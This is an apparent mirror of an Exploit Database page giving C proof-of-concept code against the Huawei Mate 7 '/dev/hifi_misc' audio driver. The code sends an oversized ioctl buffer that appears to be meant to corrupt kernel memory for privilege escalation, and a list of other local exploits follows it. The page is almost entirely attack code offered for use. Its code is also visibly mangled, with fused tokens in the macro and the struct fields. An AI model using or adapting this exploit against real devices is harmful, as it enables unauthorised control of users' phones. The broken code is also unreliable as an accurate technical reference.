Huawei Mate 7 – ‘/dev/hifi_misc’ Privilege Escalation

Exploit Database
93 阅读

作者： pray3r

日期： 2016-01-24
类别：
- local
平台：
- hardware
来源：https://www.exploit-db.com/exploits/44306/

/*
 *
 *HuaWei Mate7 hifi driver Poc
 *
 *Writen by pray3r, <pray3r.z@gmail.com>
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>

#define HIFI_MISC_IOCTL_WRITE_PARAMS_IOWR('A', 0x75, struct misc_io_sync_param)

struct misc_io_sync_param {
	void *para_in; 
	unsigned intpara_size_in; 
	void *para_out; 
	unsigned intpara_size_out; 
};

int main(int arg, char **argv)
{
	int fd; 
	void *in = malloc(300 * 1024);
	void *out = malloc(100);
	struct misc_io_sync_param poc;

	poc.para_in = in;
	poc.para_size_in = 300 * 1024;
	poc.para_out = out;
	poc.para_size_out = 100;

	fd = open("/dev/hifi_misc", O_RDWR);

	ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);

	free(in);
	free(out);

	return 0;
}

last Exploits
Huawei Mate 7 – ‘/dev/hifi_misc’ Privilege Escalation的更多信息

Kingsoft AntiVirus 2012 ‘KisKrnl.sys’ 2011.7.8.913 – Kernel Mode Privilege Escalation：
Wondershare Dr.Fone 12.0.18 – ‘Wondershare InstallAssist’ Unquoted Service Path：
Rapid7 AppSpider 6.12 – Local Privilege Escalation：
Realtek Audio Control Panel 1.0.1.65 – Local Buffer Overflow：
MPlayer – ‘.SAMI’ Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)：
Free MP3 CD Ripper 2.6 – ‘.wav’ Local Buffer Overflow：
DVD X Player 5.5 – ‘.plf’ Playlist Buffer Overflow (Metasploit)：
Smartfren Connex EC 1261-2 UI OUC – Local Privilege Escalation：